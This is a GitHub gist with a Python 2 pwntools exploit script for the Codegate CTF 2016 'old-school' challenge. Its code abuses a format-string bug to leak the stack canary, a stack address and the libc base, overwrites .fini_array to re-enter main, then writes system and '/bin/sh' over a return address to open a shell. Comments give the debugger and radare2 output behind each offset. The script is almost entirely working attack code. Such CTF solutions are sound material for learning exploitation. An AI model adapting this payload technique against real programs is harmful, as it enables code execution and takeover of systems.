Created
March 28, 2017 08:16
-
-
Save Tosainu/48c8ff0562611e8dcd6fe96ed74ffb71 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # Codegate CTF 2016 : old-school | |
| # https://github.com/ctfs/write-ups-2016/tree/master/codegate-ctf-2016/pwn/old-school | |
| from pwn import * | |
| import sys | |
| # $ ./oldschool | |
| # YOUR INPUT :AAAA%p.%p.%p.%p.%p.%p.%p.%p.%p | |
| # RESPONSE :AAAA0x3fc.0xf7733580.0x4.0x4.0x6474e550.0x16fba4.0x41414141.0x252e7025.0x70252e70 | |
| # Breakpoint 1, 0x08048516 in main () | |
| # $ebp = 0xffffcfe8 | |
| # gdb-peda$ x/300xw $esp | |
| # 0xffffcbc0: 0xffffcbdc 0x000003fc 0xf7f95580 0x00000004 | |
| # 0xffffcbd0: 0x00000004 0x6474e550 0x0016fba4 0x41414141 | |
| # 0xffffcbe0: 0x0000000a 0x00000000 0x00000000 0x00000000 | |
| # ... | |
| # 0xffffcfc0: 0x00000000 0x00000000 0x00000000 0x00000000 | |
| # 0xffffcfd0: 0x00000000 0x00000000 0x00000000 0xf96f1900 <- canary | |
| # 0xffffcfe0: 0xffffd000 <- pop ecx 0xf7f95000 <- pop edi 0x00000000 <- pop ebp 0xf7df1366 <- ret | |
| # 0xffffcff0: 0x00000001 0xf7f95000 0x00000000 0xf7df1366 | |
| # ... | |
| fsb_offset_buffer = 7 | |
| fsb_offset_stdin = fsb_offset_buffer + ((0xffffcbc8 - 0xffffcbdc) / 4) | |
| fsb_offset_canary = fsb_offset_buffer + ((0xffffcfdc - 0xffffcbdc) / 4) | |
| fsb_offset_stack = fsb_offset_buffer + ((0xffffcfe0 - 0xffffcbdc) / 4) | |
| # $ r2 -A oldschool | |
| # [0x0804849b]> iS~fini_array | |
| # idx=19 vaddr=0x080496dc paddr=0x000006dc sz=4 vsz=4 perm=--rw- name=.fini_array | |
| # [0x0804849b]> f~sym.main | |
| # 0x0804849b 163 sym.main | |
| addr_fini_array = 0x080496dc | |
| addr_main = 0x0804849b | |
| # $ r2 -A /usr/lib32/libc-2.25.so | |
| # [0x000184f0]> f~obj._IO_2_1_stdin_,sym.system,str._bin_sh | |
| # 0x00166508 8 str._bin_sh | |
| # 0x0003c290 55 sym.system | |
| # 0x001bc580 152 obj._IO_2_1_stdin_ | |
| offset_libc_stdin = 0x001bc580 | |
| offset_libc_bin_sh = 0x00166508 | |
| offset_libc_system = 0x0003c290 | |
| context(os='linux', arch='i386') | |
| if 'remote' in sys.argv: | |
| r = None | |
| else: | |
| r = process('./oldschool') | |
| log.info('leak informations and overwrite .fini_array') | |
| x1, x2 = addr_main & 0xffff, addr_main >> 16 | |
| buf = '' | |
| buf += p32(addr_fini_array) | |
| buf += p32(addr_fini_array + 2) | |
| buf += '%{}x'.format(x1 - len(buf)) | |
| buf += '%{}$hn'.format(fsb_offset_buffer) | |
| buf += '%{}x'.format(0x10000 - x1 + x2) | |
| buf += '%{}$hn'.format(fsb_offset_buffer + 1) | |
| buf += '%{}$08x'.format(fsb_offset_stdin) | |
| buf += '%{}$08x'.format(fsb_offset_stack) | |
| buf += '%{}$08x'.format(fsb_offset_canary) | |
| buf += 'nyan' | |
| r.sendline(buf) | |
| leak = r.recvuntil('nyan') | |
| addr_libc_base = int(leak[-28:-20], 16) - offset_libc_stdin | |
| addr_stack = int(leak[-20:-12], 16) | |
| canary = int(leak[-12:-4], 16) | |
| log.success('canary: 0x{:x}'.format(canary)) | |
| log.success('stack: 0x{:x}'.format(addr_stack)) | |
| log.success('libc base: 0x{:x}'.format(addr_libc_base)) | |
| log.info('overwrite return address') | |
| writes = {addr_stack - 0xe4: addr_libc_base + offset_libc_system, | |
| addr_stack - 0xe4 + 0x8: addr_libc_base + offset_libc_bin_sh} | |
| buf = fmtstr_payload(fsb_offset_buffer, writes) | |
| r.sendline(buf) | |
| r.clean() | |
| r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment